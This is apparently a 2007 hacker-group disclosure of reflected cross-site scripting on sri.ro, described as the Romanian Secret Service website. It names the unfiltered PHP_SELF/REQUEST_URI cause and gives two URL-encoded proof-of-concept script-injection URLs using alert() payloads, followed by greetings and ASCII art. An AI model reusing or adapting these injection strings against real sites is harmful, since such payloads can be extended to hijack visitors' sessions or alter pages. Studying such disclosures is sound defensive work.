####################################################################################
                   ~```````` XSS found by fl0 fl0w in sri.ro ``````~     
                    ###############################################
Description: The Romanian Secret Service web site suffers from cross site scripting vulnerability.
Author: fl0 fl0w
Homepage: http://popesculescu.lx.ro		
File Size: 5,13 KB


site 'search' variable XSS
Cross Site Scripting in URI
Desciption :
This XSS variant usually appears when a PHP script is using one of following variables without filtering them: 
*PHP_SELF 
*REQUEST_URI 
*SCRIPT_URL 
*SCRIPT_URI 
##########################Proof of concept#############################
http://sri.ro/cauta.php/%3E%22%3E%3CScRiPt%3Ealert(710%20)%3C/ScRiPt%3E

This vulnerability affects /index.php

http://sri.ro/index.php?nav=ani&lang=--%3E%3CScRiPt%20%0a%0d%3Ealert(710)%3B%3C/ScRiPt%3E

#############
Timeline
#############
discovered: 18-05-2007

Find me on http://hacking.carcabot.ro --the best hacking team in RO

Sh0utz : OSHO,Vladiii ,CarcaBot, Ultimatum , Virtual_x ,Canvasa ,all RENSLT memberz.

fl0 fl0w 2oo7 ©        
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmNNdmNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmMMMNmh+mh/dmmmyhhdNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmhhdhyhNMMMMmhmddddmhdmyyyydhhdmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdhyhhhmNNNNMMMMMMMMMMMMMMMNmmNmddhhdsmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhyhdmmNNMMMMMMNNNNmMNNNNNNMMMMMMNNNmhyosddNMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMNNdyhyhdNNMMMMMNmhyhdddhymdhdddhhhdmNNMMNNNmhdsymNMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMNmhhhshdmNNNNNdyhdhdmmNNMNNddmMMNNmmdddhddmMMMMNdmMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMNNNNmhoyhydmmmmmhhhyhmmNMMMMMMMMmdNMMMMMMMMNmdhyhdmNNNNmmNdydmNMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMNNNmhyyhs+/sshhooyhdmmmmNNNMMMMMMddNMMMMMNNNNNmmmhsoyhdy+ohyydhdNNMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMNNNmh+oss:ssyso+oyyhhdddmmmNNNNMMMddNMNNNNNmmmdddhhhyoooshhsyyysohmNMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMNNdooyyo:ossssooosssyyhhdddmmNNNNMdhNNNNmmmddhhhyyysssssyyyhossshyhmMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMNNdhyyso/+soo++/://+oossyyhhddmmNNNhhNNmmdddhyyysso++/:/++ssyysossosdmNMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMNmyoyss:ooo+/::...-::/+oosyyhhdmmmNhhmmmmdhhyssoo+/:-..-//+ossyooossshNMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMNdosoo:/o+//:-.````..-:/+oosyhhdmmmmmmmddhyyso+/:-.` ``.--//oossoyyoosmMMMMMMMMMMMMMM
MMMMMMMMMMMMMMNNy++oo/oo+/:-``     ``..-/+osyhhddmmmmddhyyso/:-.`      `.::+osyyosoosdNMMMMMMMMMMMMM
MMMMMMMMMMMMMMNmysso/oso+/:-`         ``.:/+oyhddmmdddhyso/:.`         `.-:/osyy+ohhyhmMMMMMMMMMMMMM
MMMMMMMMMMMMMMMdoo+o:syoo+:-```         ``.-:+syhddddhys+:.`         ``.-::+syyhs+ydyhmNMMMMMMMMMMMM
MMMMMMMMMMMMMMMdooso:yysso//--...````....--::/+yyhddhhyo+/:---.......--::/+oyhhhy+yyyydNMMMMMMMMMMMM
MMMMMMMMMMMMMMMmysys/syyyso+++/::::::://++ossyyhhddhhhhyysso++///::://+++osshhhho+yhhdmNMMMMMMMMMMMM
MMMMMMMMMMMMMMMMNNmdyoosyyyssoo++++++++oossyyhhdddohddddhyyssooo++++ooossyyhyyssshmNNMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMNNNmsyhhdhhyyysssooosssyyhhhddmmd.sdmmddhhyyysssssssyyyhhddddhhdmNMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMNNNmmmmmddhhhhyyyyyyyyhhdddmmmm/.yhdmmddddhhyyyyhhhhdddmmmmmmdNNMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMNNdhhdddddhhso/:ohdmmmmmmd.ydhdmmmmmmds//+oyhddmmmmdhdmMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMNmmhsys+++/::+yhdmNNNNmoymdyhmNNNNNh+-/ooso+ssssddNNMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhyydmdhhhddmmMMMNhhNNMmdmNMMMdooydmNmmdhhdmNMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhhNNMMMMNMMMMMMNNMMMmshmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhNNMMMMMMMMMMMMMMMMNyymmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhNMMMMMMMMMMMMMMMMMMdydNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdmMMMMMMMMMMMMMMMMMMNhhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdymNMMMMMMMMMMMMMMMMMMMysmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhsmMMMMMMMMMmmMMMMMMMMMysmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNysNMMNmMMMMM+hMMMMNmNMMdsdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyyNMMmyNMMMM:dMMMMmymMMmyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmydMMMmyMMMMM/dMMMMmymMMMddNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhmMMMmhMMMMM+dMMMMNhmMMMmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhmMMMmhMMMMMsdMMMMMhmMMMMmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdNMMMmdMMMMMydMMMMMdmMMMMmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMmdMMMMMydMMMMMmNMMMMNmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdMMMMMydMMMMMNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMMhdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM